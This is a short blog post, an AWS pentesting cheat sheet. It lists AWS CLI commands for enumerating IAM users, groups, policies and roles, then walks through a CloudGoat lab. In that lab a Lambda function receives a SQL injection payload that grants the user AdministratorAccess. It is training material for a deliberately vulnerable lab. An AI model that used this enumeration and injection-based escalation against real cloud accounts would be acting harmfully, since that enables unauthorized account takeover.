<h1>AWS Pentesting Cheat Sheet</h1>
<p>Published 2023-11-19, last modified 2023-11-21. Original post: <a href="https://berenkudaygorun.com/blog/blog/2023/11/19/aws-pentesting-cheat-sheet/">https://berenkudaygorun.com/blog/blog/2023/11/19/aws-pentesting-cheat-sheet/</a> (categories: aws, aws-pentesting, cheat-sheet; tag: cheat-sheet).</p>
<blockquote>
<p>On that day some faces will be in bliss (joyful).<br />
Pleased with their striving.<br />
In a lofty garden.<br />
There they hear no idle talk.<br />
Al-Ghashiyah (Gaşiye) 8-11</p>
</blockquote>
<h1>1. Enumeration</h1>
<h2>1.1. IAM</h2>
<h3>1.1.1. Users</h3>
<pre><code class="language-sh"># List users
aws iam list-users

aws iam list-ssh-public-keys [--user-name &lt;username&gt;] # SSH public keys the user uploaded for CodeCommit (defaults to the caller)

aws iam get-ssh-public-key --user-name &lt;username&gt; --ssh-public-key-id &lt;id&gt; --encoding SSH # Fetch one public key together with its metadata

aws iam list-service-specific-credentials [--user-name &lt;username&gt;] # Service-specific credentials of the user (e.g. CodeCommit HTTPS Git credentials)

aws iam get-user --user-name &lt;username&gt; # User metadata, including the permissions boundary if one is set

aws iam list-access-keys [--user-name &lt;username&gt;] # Access keys of the user (defaults to the caller); note Status and CreateDate</code></pre>
<h3>1.1.2. Group</h3>
<pre><code class="language-sh"># List groups
aws iam list-groups # All groups in the account

aws iam list-groups-for-user --user-name &lt;username&gt; # Groups the user belongs to

aws iam get-group --group-name &lt;name&gt; # Group details together with its members</code></pre>
<h3>1.1.3. Policy</h3>
<pre><code class="language-sh">## User policies
aws iam list-user-policies --user-name &lt;username&gt; # Names of the inline policies of the user

aws iam get-user-policy --user-name &lt;username&gt; --policy-name &lt;policyname&gt; # Document of one inline policy

aws iam list-attached-user-policies --user-name &lt;username&gt; # Managed policies attached to the user (inline policies are not included)

## Group policies
aws iam list-group-policies --group-name &lt;name&gt; # Names of the inline policies of the group

aws iam get-group-policy --group-name &lt;name&gt; --policy-name &lt;policyname&gt; # Document of one inline policy

aws iam list-attached-group-policies --group-name &lt;name&gt; # Managed policies attached to the group (inline policies are not included)

## Role policies
aws iam list-role-policies --role-name &lt;name&gt; # Names of the inline policies of the role

aws iam get-role-policy --role-name &lt;name&gt; --policy-name &lt;policyname&gt; # Document of one inline policy

aws iam list-attached-role-policies --role-name &lt;name&gt; # Managed policies attached to the role (inline policies are not included)

## Managed policies
aws iam list-policies [--only-attached] [--scope Local] # All managed policies; --scope Local keeps only customer-managed ones

aws iam list-policies-granting-service-access --arn &lt;identity&gt; --service-namespaces &lt;svc&gt; # Policies that grant the identity access to the given service(s)

## Managed policy content (the document lives in a policy version, not in the policy object itself)
aws iam get-policy --policy-arn &lt;arn&gt; # Metadata only; note DefaultVersionId

aws iam list-policy-versions --policy-arn &lt;arn&gt; # Up to five stored versions; any of them can be made default with iam:SetDefaultPolicyVersion

aws iam get-policy-version --policy-arn &lt;arn&gt; --version-id &lt;VERSION_X&gt; # The actual policy document, e.g. arn:aws:iam::975426262029:policy/list_apigateways with version v1
</code></pre>
<h3>1.1.4. Role</h3>
<pre><code class="language-sh"># The commands below come from a CloudGoat scenario: profile "bilbo" holds the starting user's keys and CloudGoat resources are named cg-*
# List all roles in the account; one of them should be assumable by bilbo
aws --profile bilbo --region us-east-1 iam list-roles | grep cg-

# List the inline policies of the target role
aws --profile bilbo --region us-east-1 iam list-role-policies --role-name [cg-target-role]

# Assume the CloudGoat role that can invoke Lambda functions. The response carries temporary credentials
# (AccessKeyId, SecretAccessKey, SessionToken); put them in a profile named "assumed_role" for the next steps
aws --profile bilbo --region us-east-1 sts assume-role --role-arn [cg-lambda-invoker_arn] --role-session-name [whatever_you_want_here]
</code></pre>
<h2>1.2. Lambda</h2>
<h3>1.2.1. List</h3>
<pre><code class="language-sh"># List all Lambda functions; the CloudGoat function's name should start with "cg-"
aws --profile assumed_role --region us-east-1 lambda list-functions

# Details of the function that can apply policies to bilbo, including a pre-signed URL (Code.Location) from which its deployment package can be downloaded and read
aws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]</code></pre>
<h3>1.2.2. Invoke</h3>
<pre><code class="language-sh"># Send a SQL injection payload to the function. The '"'"' sequence closes the single-quoted shell string, inserts a literal ' and reopens it,
# so the function receives the policy name  AdministratorAccess' --  : the quote ends the string in its query and -- comments out the rest of it
aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "[bilbo_user_name_here]"}' out.txt

# The function's response body is written to out.txt</code></pre>
<p>NOTE: To be updated...</p>